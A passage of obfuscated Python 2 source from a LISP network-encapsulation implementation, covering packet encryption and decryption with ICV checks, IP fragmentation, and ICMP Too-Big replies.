    if 32 - 32: OoOoOO00 % OoO0O00 + i11iIiiIii + ooOoO0o - Ii1I + oO0o
    if 31 - 31: iIii1I11I1II1 - o0oOOo0O0Ooo
    if 57 - 57: Oo0Ooo % OoO0O00
    if 1 - 1: OoOoOO00 * O0 . oO0o % O0 + II111iiii
    # Pad to the AES block size and fetch the next IV.
    IIii1i = self . cipher_pad ( self . packet )
    i1Oo = key . get_iv ( )
    if 15 - 15: i1IIi + IiII % I1IiiI / i11iIiiIii * OoOoOO00

    #
    # Select the encrypt function for the key's cipher suite.  For GCM,
    # also capture the digest function for the authentication tag.
    #
    Oo0OO0000oooo = lisp_get_timestamp ( )
    oOiI1I = None
    if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
        i111I1 = chacha . ChaCha ( key . encrypt_key , i1Oo ) . encrypt
    elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
        OOOo0Oo0O = binascii . unhexlify ( key . encrypt_key )
        try :
            i1I1I1iIIi = AES . new ( OOOo0Oo0O , AES . MODE_GCM , i1Oo )
            i111I1 = i1I1I1iIIi . encrypt
            oOiI1I = i1I1I1iIIi . digest
        except :
            lprint ( "You need AES-GCM, do a 'pip install pycryptodome'" )
            return ( [ self . packet , False ] )
        if 46 - 46: I1IiiI . IiII - i11iIiiIii - I1Ii111
    else :
        OOOo0Oo0O = binascii . unhexlify ( key . encrypt_key )
        i111I1 = AES . new ( OOOo0Oo0O , AES . MODE_CBC , i1Oo ) . encrypt
    if 97 - 97: II111iiii % Oo0Ooo * IiII
    if 51 - 51: Oo0Ooo % OOooOOo . Oo0Ooo
    o0o0oO0OOO = i111I1 ( IIii1i )
    if 66 - 66: Ii1I * iIii1I11I1II1 - ooOoO0o / I1IiiI
    if ( o0o0oO0OOO == None ) : return ( [ self . packet , False ] )
    # Microseconds spent encrypting, for the log line below.
    Oo0OO0000oooo = int ( str ( time . time ( ) - Oo0OO0000oooo ) . split ( "." ) [ 1 ] [ 0 : 6 ] )
    if 62 - 62: IiII . O0 . iIii1I11I1II1
    if 94 - 94: ooOoO0o % I11i % i1IIi
    if 90 - 90: Ii1I * OoO0O00
    if 7 - 7: iII111i . Ii1I . iII111i - I1Ii111
    if 33 - 33: ooOoO0o + OoooooooOO - OoO0O00 / i1IIi / OoooooooOO
    if 82 - 82: I1ii11iIi11i / OOooOOo - iII111i / Oo0Ooo * OoO0O00
    # GCM: append the authentication tag to the ciphertext.
    if ( oOiI1I != None ) : o0o0oO0OOO += oOiI1I ( )
    if 55 - 55: OoooooooOO
    if 73 - 73: OoOoOO00 - I1ii11iIi11i % Oo0Ooo + I1ii11iIi11i - O0 . OoO0O00
    if 38 - 38: O0
    if 79 - 79: i1IIi . oO0o
    if 34 - 34: I1Ii111 * II111iiii

    #
    # Compute the ICV over LISP-header + IV + ciphertext after setting
    # the key-id in the LISP header.
    #
    self . lisp_header . key_id ( key . key_id )
    O0oooo0O = self . lisp_header . encode ( )
    if 71 - 71: IiII
    o00OOo0o = key . do_icv ( O0oooo0O + i1Oo + o0o0oO0OOO , i1Oo )
    if 48 - 48: i11iIiiIii / II111iiii + Ii1I + o0oOOo0O0Ooo . I1Ii111 % OOooOOo
    o0 = 4 if ( key . do_poly ) else 8
    if 91 - 91: i11iIiiIii % I1Ii111 * oO0o - I1ii11iIi11i . I1Ii111
    iI = bold ( "Encrypt" , False )
    o00ooO000Oo00 = bold ( key . cipher_suite_string , False )
    addr_str = "RLOC: " + red ( addr_str , False )
    iI1 = "poly" if key . do_poly else "sha256"
    iI1 = bold ( iI1 , False )
    oOoo = "ICV({}): 0x{}...{}" . format ( iI1 , o00OOo0o [ 0 : o0 ] , o00OOo0o [ - o0 : : ] )
    dprint ( "{} for key-id: {}, {}, {}, {}-time: {} usec" . format ( iI , key . key_id , addr_str , oOoo , o00ooO000Oo00 , Oo0OO0000oooo ) )
    if 59 - 59: IiII % Ii1I
    if 57 - 57: I11i . O0 % OoooooooOO . I1IiiI . i1IIi - II111iiii

    #
    # Pack the hex ICV string into wire format: 16 bytes (byte-swapped
    # 64-bit halves) for poly1305, 20 bytes for sha256-based ICV.
    #
    o00OOo0o = int ( o00OOo0o , 16 )
    if ( key . do_poly ) :
        ooooO0o000oOO = byte_swap_64 ( ( o00OOo0o >> 64 ) & LISP_8_64_MASK )
        Ii11Iiii = byte_swap_64 ( o00OOo0o & LISP_8_64_MASK )
        o00OOo0o = struct . pack ( "QQ" , ooooO0o000oOO , Ii11Iiii )
    else :
        ooooO0o000oOO = byte_swap_64 ( ( o00OOo0o >> 96 ) & LISP_8_64_MASK )
        Ii11Iiii = byte_swap_64 ( ( o00OOo0o >> 32 ) & LISP_8_64_MASK )
        ooO0o00OOo = socket . htonl ( o00OOo0o & 0xffffffff )
        o00OOo0o = struct . pack ( "QQI" , ooooO0o000oOO , Ii11Iiii , ooO0o00OOo )
    if 50 - 50: II111iiii
    if 39 - 39: II111iiii . OoOoOO00 - Oo0Ooo * i1IIi . OoooooooOO
    return ( [ i1Oo + o0o0oO0OOO + o00OOo0o , True ] )
if 44 - 44: I1IiiI
if 55 - 55: oO0o . I1Ii111 * I1Ii111
def decrypt ( self , packet , header_length , key , addr_str ) :
    """
    Verify the ICV on an encrypted LISP data packet and decrypt it.
    "packet" starts at the IV; "header_length" is the byte count of the
    headers preserved in self.packet.  Returns [plaintext, True] on
    success or [None, False] on ICV/decrypt failure (packet_error is set
    accordingly).  addr_str is the source RLOC string for logging.
    """
    if 82 - 82: I1IiiI % OoO0O00 % I11i + I11i
    if 6 - 6: Oo0Ooo
    if 73 - 73: I1Ii111 * I1ii11iIi11i + o0oOOo0O0Ooo - Oo0Ooo . I11i
    if 93 - 93: i11iIiiIii
    if 80 - 80: i1IIi . I1IiiI - oO0o + OOooOOo + iII111i % oO0o
    if 13 - 13: II111iiii / OoOoOO00 / OoOoOO00 + ooOoO0o

    #
    # Strip and reassemble the trailing ICV: 16 bytes for poly1305,
    # 20 bytes for the sha256-based ICV (reverses the packing done by
    # encrypt()).
    #
    if ( key . do_poly ) :
        ooooO0o000oOO , Ii11Iiii = struct . unpack ( "QQ" , packet [ - 16 : : ] )
        Ii1i = byte_swap_64 ( ooooO0o000oOO ) << 64
        Ii1i |= byte_swap_64 ( Ii11Iiii )
        Ii1i = lisp_hex_string ( Ii1i ) . zfill ( 32 )
        packet = packet [ 0 : - 16 ]
        o0 = 4
        ooooOoOooo00Oo = bold ( "poly" , False )
    else :
        ooooO0o000oOO , Ii11Iiii , ooO0o00OOo = struct . unpack ( "QQI" , packet [ - 20 : : ] )
        Ii1i = byte_swap_64 ( ooooO0o000oOO ) << 96
        Ii1i |= byte_swap_64 ( Ii11Iiii ) << 32
        Ii1i |= socket . htonl ( ooO0o00OOo )
        Ii1i = lisp_hex_string ( Ii1i ) . zfill ( 40 )
        packet = packet [ 0 : - 20 ]
        o0 = 8
        ooooOoOooo00Oo = bold ( "sha" , False )
    if 72 - 72: I11i
    O0oooo0O = self . lisp_header . encode ( )
    if 26 - 26: IiII % Oo0Ooo
    if 72 - 72: O0 + o0oOOo0O0Ooo + I1IiiI / Oo0Ooo
    if 83 - 83: IiII - I1IiiI . Ii1I
    if 34 - 34: OoOoOO00 - oO0o * OoooooooOO

    #
    # IV length depends on the cipher suite.
    #
    if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
        IiI1I1IIIi1i = 8
        o00ooO000Oo00 = bold ( "chacha" , False )
    elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
        IiI1I1IIIi1i = 12
        o00ooO000Oo00 = bold ( "aes-gcm" , False )
    else :
        IiI1I1IIIi1i = 16
        o00ooO000Oo00 = bold ( "aes-cbc" , False )
    if 73 - 73: O0 * I1Ii111 . i1IIi
    i1Oo = packet [ 0 : IiI1I1IIIi1i ]
    if 51 - 51: OoO0O00 - iII111i % O0 - OoOoOO00
    if 53 - 53: iII111i / i1IIi / i1IIi
    if 77 - 77: I11i + i1IIi . I11i
    if 89 - 89: o0oOOo0O0Ooo + OOooOOo * oO0o

    #
    # Recompute the ICV over LISP-header + IV + ciphertext and compare
    # with the received one; on mismatch log, try other decap keys, and
    # drop the packet.
    #
    i1iI1IIi = key . do_icv ( O0oooo0O + packet , i1Oo )
    if 27 - 27: O0 / OoO0O00
    O000oooO0 = "0x{}...{}" . format ( Ii1i [ 0 : o0 ] , Ii1i [ - o0 : : ] )
    oOO00 = "0x{}...{}" . format ( i1iI1IIi [ 0 : o0 ] , i1iI1IIi [ - o0 : : ] )
    if 91 - 91: I1ii11iIi11i + iIii1I11I1II1 % IiII
    if ( i1iI1IIi != Ii1i ) :
        self . packet_error = "ICV-error"
        O0o0OOOO0 = o00ooO000Oo00 + "/" + ooooOoOooo00Oo
        ii1 = bold ( "ICV failed ({})" . format ( O0o0OOOO0 ) , False )
        oOoo = "packet-ICV {} != computed-ICV {}" . format ( O000oooO0 , oOO00 )
        dprint ( ( "{} from RLOC {}, receive-port: {}, key-id: {}, " + "packet dropped, {}" ) . format ( ii1 , red ( addr_str , False ) ,
            # O0 * I1ii11iIi11i * oO0o + OoO0O00 + I1ii11iIi11i - I1Ii111
            self . udp_sport , key . key_id , oOoo ) )
        dprint ( "{}" . format ( key . print_keys ( ) ) )
        if 10 - 10: I1ii11iIi11i + IiII
        if 58 - 58: I1IiiI + OoooooooOO / iII111i . ooOoO0o % o0oOOo0O0Ooo / I1ii11iIi11i
        if 62 - 62: II111iiii
        if 12 - 12: IiII + II111iiii
        if 92 - 92: I1Ii111 % iIii1I11I1II1 - iII111i / i11iIiiIii % ooOoO0o * o0oOOo0O0Ooo
        if 80 - 80: iII111i
        lisp_retry_decap_keys ( addr_str , O0oooo0O + packet , i1Oo , Ii1i )
        return ( [ None , False ] )
    if 3 - 3: I1ii11iIi11i * I11i
    if 53 - 53: iIii1I11I1II1 / iII111i % OoO0O00 + IiII / ooOoO0o
    if 74 - 74: Oo0Ooo
    if 8 - 8: I1IiiI % II111iiii - o0oOOo0O0Ooo - I11i % I1IiiI
    if 93 - 93: Ii1I * iII111i / OOooOOo
    # Strip the IV before decrypting.
    packet = packet [ IiI1I1IIIi1i : : ]
    if 88 - 88: oO0o
    if 1 - 1: Oo0Ooo
    if 95 - 95: OoooooooOO / I11i % OoooooooOO / ooOoO0o * IiII
    if 75 - 75: O0

    #
    # Select the decrypt function for the key's cipher suite and decrypt.
    #
    Oo0OO0000oooo = lisp_get_timestamp ( )
    if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
        oOoO = chacha . ChaCha ( key . encrypt_key , i1Oo ) . decrypt
    elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
        OOOo0Oo0O = binascii . unhexlify ( key . encrypt_key )
        try :
            oOoO = AES . new ( OOOo0Oo0O , AES . MODE_GCM , i1Oo ) . decrypt
        except :
            self . packet_error = "no-decrypt-key"
            lprint ( "You need AES-GCM, do a 'pip install pycryptodome'" )
            return ( [ None , False ] )
        if 59 - 59: OOooOOo + I1IiiI / II111iiii / OoOoOO00
    else :
        if ( ( len ( packet ) % 16 ) != 0 ) :
            dprint ( "Ciphertext not multiple of 16 bytes, packet dropped" )
            return ( [ None , False ] )
        if 80 - 80: OoOoOO00 + iIii1I11I1II1 . IiII
        OOOo0Oo0O = binascii . unhexlify ( key . encrypt_key )
        oOoO = AES . new ( OOOo0Oo0O , AES . MODE_CBC , i1Oo ) . decrypt
    if 76 - 76: I1IiiI * OOooOOo
    if 12 - 12: iIii1I11I1II1 / I11i % Ii1I
    IIiiI11 = oOoO ( packet )
    # Microseconds spent decrypting, for the log line below.
    Oo0OO0000oooo = int ( str ( time . time ( ) - Oo0OO0000oooo ) . split ( "." ) [ 1 ] [ 0 : 6 ] )
    if 7 - 7: I1IiiI / OoO0O00 + I1Ii111 + I11i / I1IiiI
    if 82 - 82: I1ii11iIi11i + OoooooooOO
    if 21 - 21: oO0o * oO0o / I11i . iII111i
    if 10 - 10: Ii1I * OOooOOo - Oo0Ooo - OoooooooOO / o0oOOo0O0Ooo
    iI = bold ( "Decrypt" , False )
    addr_str = "RLOC: " + red ( addr_str , False )
    iI1 = "poly" if key . do_poly else "sha256"
    iI1 = bold ( iI1 , False )
    oOoo = "ICV({}): {}" . format ( iI1 , O000oooO0 )
    dprint ( "{} for key-id: {}, {}, {} (good), {}-time: {} usec" . format ( iI , key . key_id , addr_str , oOoo , o00ooO000Oo00 , Oo0OO0000oooo ) )
    if 86 - 86: I1Ii111 % I1IiiI
    if 22 - 22: i11iIiiIii * I1Ii111 . Oo0Ooo . OoooooooOO + I1IiiI
    if 24 - 24: II111iiii / Ii1I . iIii1I11I1II1 - II111iiii % O0
    if 8 - 8: OoO0O00 % iII111i . OoooooooOO - Ii1I % OoooooooOO
    if 61 - 61: o0oOOo0O0Ooo / i11iIiiIii
    if 28 - 28: OOooOOo / OoOoOO00
    if 30 - 30: ooOoO0o
    # Keep only the headers in self.packet; return plaintext separately.
    self . packet = self . packet [ 0 : header_length ]
    return ( [ IIiiI11 , True ] )
if 57 - 57: o0oOOo0O0Ooo * i11iIiiIii / OoOoOO00
if 40 - 40: iIii1I11I1II1 - ooOoO0o / Oo0Ooo
def fragment_outer ( self , outer_hdr , inner_packet ) :
    """
    Fragment inner_packet at the OUTER IPv4 level into 1000-byte pieces,
    rewriting the supplied outer IPv4 header's fragment-offset, length
    and checksum fields for each piece.  Returns the list of fragments
    (header + payload each).
    """
    iIi11ii1 = 1000
    if 49 - 49: oO0o . OoOoOO00
    if 73 - 73: Ii1I / I1IiiI / OoooooooOO + I1IiiI
    if 57 - 57: OOooOOo . Ii1I % o0oOOo0O0Ooo
    if 32 - 32: I11i / IiII - O0 * iIii1I11I1II1
    if 70 - 70: OoooooooOO % OoooooooOO % OoO0O00

    #
    # Slice the payload into fixed-size chunks.
    #
    oo0O0OO = [ ]
    OoO00oo00 = 0
    iiiIIiiIi = len ( inner_packet )
    while ( OoO00oo00 < iiiIIiiIi ) :
        oO = inner_packet [ OoO00oo00 : : ]
        if ( len ( oO ) > iIi11ii1 ) : oO = oO [ 0 : iIi11ii1 ]
        oo0O0OO . append ( oO )
        OoO00oo00 += len ( oO )
    if 30 - 30: I1Ii111 / o0oOOo0O0Ooo % oO0o
    if 38 - 38: o0oOOo0O0Ooo . oO0o / o0oOOo0O0Ooo % II111iiii
    if 47 - 47: I11i * iIii1I11I1II1 * iII111i - OoO0O00 . O0 . ooOoO0o
    if 32 - 32: o0oOOo0O0Ooo % I1IiiI
    if 7 - 7: Oo0Ooo . i1IIi - oO0o
    if 93 - 93: IiII % I1ii11iIi11i

    #
    # Build one IP fragment per chunk: set more-fragments (0x2000) on all
    # but the last, patch total-length, and recompute the checksum.  The
    # offset counter advances in 8-byte units (python2 "/" floors).
    #
    IiIIii = [ ]
    OoO00oo00 = 0
    for oO in oo0O0OO :
        if 74 - 74: iIii1I11I1II1 / Ii1I
        if 59 - 59: Ii1I / II111iiii - IiII % OoOoOO00 % OoooooooOO
        if 79 - 79: iII111i . OoooooooOO . I1IiiI * O0 * OoO0O00 - OOooOOo
        if 33 - 33: I1ii11iIi11i . Oo0Ooo + I1IiiI + o0oOOo0O0Ooo
        O00000OO00OO = OoO00oo00 if ( oO == oo0O0OO [ - 1 ] ) else 0x2000 + OoO00oo00
        O00000OO00OO = socket . htons ( O00000OO00OO )
        outer_hdr = outer_hdr [ 0 : 6 ] + struct . pack ( "H" , O00000OO00OO ) + outer_hdr [ 8 : : ]
        if 35 - 35: Oo0Ooo
        if 47 - 47: i1IIi % ooOoO0o - Oo0Ooo * I11i / i11iIiiIii
        if 45 - 45: I1IiiI . Oo0Ooo . I1Ii111 / oO0o
        if 4 - 4: i11iIiiIii + OOooOOo
        I1111III111ii = socket . htons ( len ( oO ) + 20 )
        outer_hdr = outer_hdr [ 0 : 2 ] + struct . pack ( "H" , I1111III111ii ) + outer_hdr [ 4 : : ]
        outer_hdr = lisp_ip_checksum ( outer_hdr )
        IiIIii . append ( outer_hdr + oO )
        OoO00oo00 += len ( oO ) / 8
    if 90 - 90: I11i
    return ( IiIIii )
if 88 - 88: OoO0O00
if 85 - 85: oO0o
def send_icmp_too_big ( self , inner_packet ) :
    """
    Send an ICMP Destination-Unreachable / Fragmentation-Needed
    (type 3, code 4) with MTU 1400 back to the inner source, rate
    limited by LISP_ICMP_TOO_BIG_RATE_LIMIT.  Returns True when the
    message was sent, False when rate-limited or sendto() failed.
    """
    global lisp_last_icmp_too_big_sent
    global lisp_icmp_raw_socket
    if 7 - 7: o0oOOo0O0Ooo
    oO000o0Oo00 = time . time ( ) - lisp_last_icmp_too_big_sent
    if ( oO000o0Oo00 < LISP_ICMP_TOO_BIG_RATE_LIMIT ) :
        lprint ( "Rate limit sending ICMP Too-Big to {}" . format ( self . inner_source . print_address_no_iid ( ) ) )
        if 99 - 99: i11iIiiIii - iII111i
        return ( False )
    if 85 - 85: I1Ii111 % I1ii11iIi11i
    if 95 - 95: OoO0O00 * OOooOOo * iII111i . o0oOOo0O0Ooo
    if 73 - 73: OoO0O00
    if 28 - 28: OoooooooOO - I11i
    if 84 - 84: II111iiii
    if 36 - 36: OOooOOo - OoOoOO00 - iIii1I11I1II1
    if 10 - 10: I1ii11iIi11i / Ii1I * i1IIi % O0 + I11i
    if 25 - 25: I1Ii111 - Ii1I / O0 . OoooooooOO % I1IiiI . i1IIi
    if 19 - 19: II111iiii / II111iiii % I1ii11iIi11i + oO0o + oO0o + iII111i
    if 4 - 4: o0oOOo0O0Ooo + I11i / iII111i + i1IIi % o0oOOo0O0Ooo % iII111i
    if 80 - 80: Ii1I
    if 26 - 26: iIii1I11I1II1 . OoooooooOO - iIii1I11I1II1
    if 59 - 59: I1ii11iIi11i + I11i . oO0o
    if 87 - 87: OoO0O00
    if 34 - 34: I1Ii111 . OoOoOO00 / i11iIiiIii / iII111i

    #
    # ICMP body: type 3, code 4, checksum 0, unused, MTU, followed by
    # the inner IP header plus the first 8 payload bytes.
    #
    II1iII1 = socket . htons ( 1400 )
    O00ooooo00 = struct . pack ( "BBHHH" , 3 , 4 , 0 , 0 , II1iII1 )
    O00ooooo00 += inner_packet [ 0 : 20 + 8 ]
    O00ooooo00 = lisp_icmp_checksum ( O00ooooo00 )
    if 31 - 31: Ii1I * o0oOOo0O0Ooo * Ii1I + OoO0O00 * o0oOOo0O0Ooo . I1Ii111
    if 89 - 89: OoooooooOO * Ii1I * I1IiiI . ooOoO0o * Ii1I / iII111i
    if 46 - 46: i11iIiiIii
    if 15 - 15: O0 / i1IIi / i1IIi . iII111i % OoOoOO00 + I1IiiI
    if 48 - 48: I1Ii111 % iII111i % Ii1I % iIii1I11I1II1 . Ii1I
    if 14 - 14: iII111i * OoO0O00 % O0 + I11i + I1ii11iIi11i
    if 23 - 23: Oo0Ooo % iII111i + Ii1I - I1Ii111

    #
    # Addresses: send back to the inner source, sourced from our outer
    # source RLOC.  ooOO is the inner header's source-address bytes.
    #
    ooOO = inner_packet [ 12 : 16 ]
    oO0o0 = self . inner_source . print_address_no_iid ( )
    i1Ii1i11ii = self . outer_source . pack_address ( )
    if 58 - 58: OoOoOO00 + OoO0O00 * Ii1I
    if 31 - 31: oO0o - iII111i
    if 46 - 46: I1IiiI + Oo0Ooo - Ii1I
    if 99 - 99: OOooOOo + I1IiiI . I1ii11iIi11i * OoooooooOO
    if 82 - 82: i11iIiiIii + iIii1I11I1II1 / Oo0Ooo + OOooOOo * II111iiii
    if 34 - 34: o0oOOo0O0Ooo % OoooooooOO
    if 36 - 36: I1IiiI
    if 64 - 64: i11iIiiIii + i1IIi % O0 . I11i

    #
    # Build the outgoing IPv4 header (ttl 32, protocol 1/ICMP), checksum
    # it, byte-swap fields for the raw socket, and append the ICMP body.
    #
    Iiii = socket . htons ( 20 + 36 )
    Ooo0oO = struct . pack ( "BBHHHBBH" , 0x45 , 0 , Iiii , 0 , 0 , 32 , 1 , 0 ) + i1Ii1i11ii + ooOO
    Ooo0oO = lisp_ip_checksum ( Ooo0oO )
    Ooo0oO = self . fix_outer_header ( Ooo0oO )
    Ooo0oO += O00ooooo00
    o00o0 = bold ( "Too-Big" , False )
    lprint ( "Send ICMP {} to {}, mtu 1400: {}" . format ( o00o0 , oO0o0 ,
        lisp_format_packet ( Ooo0oO ) ) )
    if 84 - 84: OoOoOO00 - Oo0Ooo . ooOoO0o . IiII - Oo0Ooo
    try :
        lisp_icmp_raw_socket . sendto ( Ooo0oO , ( oO0o0 , 0 ) )
    except socket . error , oOo :
        lprint ( "lisp_icmp_raw_socket.sendto() failed: {}" . format ( oOo ) )
        return ( False )
    if 99 - 99: I1Ii111
    if 75 - 75: ooOoO0o . OOooOOo / IiII
    if 84 - 84: OoooooooOO . I1IiiI / o0oOOo0O0Ooo
    if 86 - 86: Oo0Ooo % OoOoOO00
    if 77 - 77: Ii1I % OOooOOo / oO0o
    if 91 - 91: OoO0O00 / OoO0O00 . II111iiii . ooOoO0o - I1IiiI
    # Remember when we last sent one, for the rate limiter above.
    lisp_last_icmp_too_big_sent = lisp_get_timestamp ( )
    return ( True )
if 23 - 23: I1IiiI
def fragment ( self ) :
    """
    Fragment the encapsulated packet in self.packet when it exceeds 1500
    bytes.  Returns (fragment-list, reason-string): "Fragment-None" when
    no fragmentation is needed, "Fragment-Outer" for non-IPv4 inner
    packets (outer-header fragmentation), "Fragment-Inner" for IPv4
    inner fragmentation, "Fragment-None-DF-bit" (empty list) when the
    inner DF bit forbids it, or ([], None) after sending ICMP Too-Big.
    """
    global lisp_icmp_raw_socket
    global lisp_ignore_df_bit
    if 7 - 7: iII111i % I1ii11iIi11i
    IIii1i = self . fix_outer_header ( self . packet )
    if 64 - 64: I1Ii111 + i11iIiiIii
    if 35 - 35: OoOoOO00 + i1IIi % OOooOOo
    if 68 - 68: IiII . ooOoO0o
    if 64 - 64: i1IIi + Oo0Ooo * I1IiiI / OOooOOo
    if 3 - 3: Oo0Ooo / ooOoO0o + ooOoO0o . I1ii11iIi11i
    if 50 - 50: iIii1I11I1II1 * oO0o
    # No fragmentation needed when the packet fits a 1500-byte MTU.
    iiiIIiiIi = len ( IIii1i )
    if ( iiiIIiiIi <= 1500 ) : return ( [ IIii1i ] , "Fragment-None" )
    if 85 - 85: i1IIi
    IIii1i = self . packet
    if 100 - 100: OoooooooOO / I11i % OoO0O00 + Ii1I
    if 42 - 42: Oo0Ooo / IiII . Ii1I * I1IiiI
    if 54 - 54: OoOoOO00 * iII111i + OoO0O00
    if 93 - 93: o0oOOo0O0Ooo / I1IiiI
    if 47 - 47: Oo0Ooo * OOooOOo

    #
    # Non-IPv4 inner packet: fragment at the outer header instead, with
    # a fresh random IP identification value.
    #
    if ( self . inner_version != 4 ) :
        oOoO0O00o = random . randint ( 0 , 0xffff )
        IiI11II = IIii1i [ 0 : 4 ] + struct . pack ( "H" , oOoO0O00o ) + IIii1i [ 6 : 20 ]
        OO0 = IIii1i [ 20 : : ]
        IiIIii = self . fragment_outer ( IiI11II , OO0 )
        return ( IiIIii , "Fragment-Outer" )
    if 18 - 18: I1IiiI * IiII / OoOoOO00 / oO0o / Ii1I * ooOoO0o
    if 51 - 51: oO0o
    if 34 - 34: OoOoOO00 . i11iIiiIii * OOooOOo . ooOoO0o * O0 * OoO0O00
    if 27 - 27: Ii1I . o0oOOo0O0Ooo - OoOoOO00 . II111iiii % Oo0Ooo
    if 83 - 83: I11i + oO0o - iIii1I11I1II1 + II111iiii . iII111i

    #
    # Split buffer into outer headers, inner IPv4 header, inner payload.
    # Outer header length is 56 (IPv6 outer) or 36 (IPv4 outer).
    #
    oOO0 = 56 if ( self . outer_version == 6 ) else 36
    IiI11II = IIii1i [ 0 : oOO0 ]
    oOooooO = IIii1i [ oOO0 : oOO0 + 20 ]
    OO0 = IIii1i [ oOO0 + 20 : : ]
    if 79 - 79: I1ii11iIi11i - iIii1I11I1II1 % i1IIi / Oo0Ooo + II111iiii
    if 95 - 95: oO0o
    if 48 - 48: I11i / iIii1I11I1II1 % II111iiii
    if 39 - 39: i1IIi . I1ii11iIi11i / I11i / I11i
    if 100 - 100: OoooooooOO - OoooooooOO + IiII

    #
    # Honor the inner DF bit: try ICMP Too-Big, else drop unless
    # configured to ignore DF.
    #
    iIiIi1i1Iiii = struct . unpack ( "H" , oOooooO [ 6 : 8 ] ) [ 0 ]
    iIiIi1i1Iiii = socket . ntohs ( iIiIi1i1Iiii )
    if ( iIiIi1i1Iiii & 0x4000 ) :
        if ( lisp_icmp_raw_socket != None ) :
            OOO00000O = IIii1i [ oOO0 : : ]
            if ( self . send_icmp_too_big ( OOO00000O ) ) : return ( [ ] , None )
        if 23 - 23: Oo0Ooo - O0
        if ( lisp_ignore_df_bit ) :
            iIiIi1i1Iiii &= ~ 0x4000
        else :
            iI111iIi = bold ( "DF-bit set" , False )
            dprint ( "{} in inner header, packet discarded" . format ( iI111iIi ) )
            return ( [ ] , "Fragment-None-DF-bit" )
    if 26 - 26: OOooOOo % OOooOOo / i11iIiiIii + I1ii11iIi11i - O0
    if 20 - 20: I1Ii111 . O0 - I1ii11iIi11i / OoOoOO00 - o0oOOo0O0Ooo
    if 79 - 79: OoooooooOO - iIii1I11I1II1

    #
    # Chop the inner payload into 1400-byte pieces.
    #
    OoO00oo00 = 0
    iiiIIiiIi = len ( OO0 )
    IiIIii = [ ]
    while ( OoO00oo00 < iiiIIiiIi ) :
        IiIIii . append ( OO0 [ OoO00oo00 : OoO00oo00 + 1400 ] )
        OoO00oo00 += 1400
    if 9 - 9: i1IIi - OoOoOO00
    if 57 - 57: iIii1I11I1II1 * Ii1I * iII111i / oO0o
    if 46 - 46: Ii1I
    if 61 - 61: o0oOOo0O0Ooo / ooOoO0o - II111iiii
    if 87 - 87: I1ii11iIi11i / I1IiiI

    #
    # For each piece, rebuild the inner IPv4 header (fragment offset in
    # 8-byte units, more-fragments bit, length, zeroed checksum field),
    # then re-prepend and fix up the outer headers.  If the original was
    # already a fragment (MF set), every piece keeps MF set.
    #
    oo0O0OO = IiIIii
    IiIIii = [ ]
    IIi1IiiIi1III = True if iIiIi1i1Iiii & 0x2000 else False
    iIiIi1i1Iiii = ( iIiIi1i1Iiii & 0x1fff ) * 8
    for oO in oo0O0OO :
        if 19 - 19: i1IIi % I1IiiI - iIii1I11I1II1 - oO0o / I1ii11iIi11i
        if 16 - 16: Ii1I
        if 79 - 79: OoooooooOO - ooOoO0o * Ii1I - II111iiii % OoOoOO00 * IiII
        if 31 - 31: I1IiiI
        IIII1I1 = iIiIi1i1Iiii / 8
        if ( IIi1IiiIi1III ) :
            IIII1I1 |= 0x2000
        elif ( oO != oo0O0OO [ - 1 ] ) :
            IIII1I1 |= 0x2000
        if 36 - 36: Ii1I * I11i . I11i / Oo0Ooo / I1IiiI
        IIII1I1 = socket . htons ( IIII1I1 )
        oOooooO = oOooooO [ 0 : 6 ] + struct . pack ( "H" , IIII1I1 ) + oOooooO [ 8 : : ]
        if 80 - 80: OoooooooOO - i1IIi
        if 51 - 51: i1IIi . OoOoOO00 / OoOoOO00 % i11iIiiIii * OOooOOo - I1Ii111
        if 49 - 49: Oo0Ooo - iIii1I11I1II1
        if 64 - 64: I1Ii111 + iIii1I11I1II1
        if 14 - 14: Ii1I / OoooooooOO + II111iiii . O0 / i1IIi
        if 58 - 58: o0oOOo0O0Ooo / i11iIiiIii / O0 % I11i % I1IiiI
        iiiIIiiIi = len ( oO )
        iIiIi1i1Iiii += iiiIIiiIi
        I1111III111ii = socket . htons ( iiiIIiiIi + 20 )
        oOooooO = oOooooO [ 0 : 2 ] + struct . pack ( "H" , I1111III111ii ) + oOooooO [ 4 : 10 ] + struct . pack ( "H" , 0 ) + oOooooO [ 12 : : ]
        if 86 - 86: IiII + OoOoOO00 / I1IiiI + I11i % I11i / i11iIiiIii
        oOooooO = lisp_ip_checksum ( oOooooO )
        iIiI1I = oOooooO + oO
        if 2 - 2: o0oOOo0O0Ooo . Ii1I % OoOoOO00
        if 58 - 58: I1ii11iIi11i % Ii1I * Ii1I - iII111i
        if 9 - 9: ooOoO0o - Ii1I % II111iiii + IiII + OOooOOo % O0
        if 65 - 65: OOooOOo - OoO0O00 % i11iIiiIii
        if 58 - 58: iII111i

        #
        # For an IPv4 outer header, patch its total length, recompute
        # its checksum and byte-swap fields for the raw socket.
        #
        iiiIIiiIi = len ( iIiI1I )
        if ( self . outer_version == 4 ) :
            I1111III111ii = iiiIIiiIi + oOO0
            iiiIIiiIi += 16
            IiI11II = IiI11II [ 0 : 2 ] + struct . pack ( "H" , I1111III111ii ) + IiI11II [ 4 : : ]
            if 2 - 2: II111iiii + i1IIi
            IiI11II = lisp_ip_checksum ( IiI11II )
            iIiI1I = IiI11II + iIiI1I
            iIiI1I = self . fix_outer_header ( iIiI1I )
        if 68 - 68: OOooOOo + Ii1I
        if 58 - 58: IiII * Ii1I . i1IIi
        if 19 - 19: oO0o
        if 85 - 85: ooOoO0o - I1IiiI / i1IIi / OoO0O00 / II111iiii
        if 94 - 94: iIii1I11I1II1 + IiII

        #
        # Patch the UDP length field (12 bytes before the inner header).
        #
        II11II = oOO0 - 12
        I1111III111ii = socket . htons ( iiiIIiiIi )
        iIiI1I = iIiI1I [ 0 : II11II ] + struct . pack ( "H" , I1111III111ii ) + iIiI1I [ II11II + 2 : : ]
        if 40 - 40: iII111i + O0
        IiIIii . append ( iIiI1I )
    if 18 - 18: iIii1I11I1II1 % iIii1I11I1II1 % oO0o + I1IiiI % ooOoO0o / Ii1I
    return ( IiIIii , "Fragment-Inner" )
if 36 - 36: OoOoOO00 . i11iIiiIii
if 81 - 81: Oo0Ooo * iII111i * OoO0O00
def fix_outer_header ( self , packet ) :
if 85 - 85: O0 * oO0o
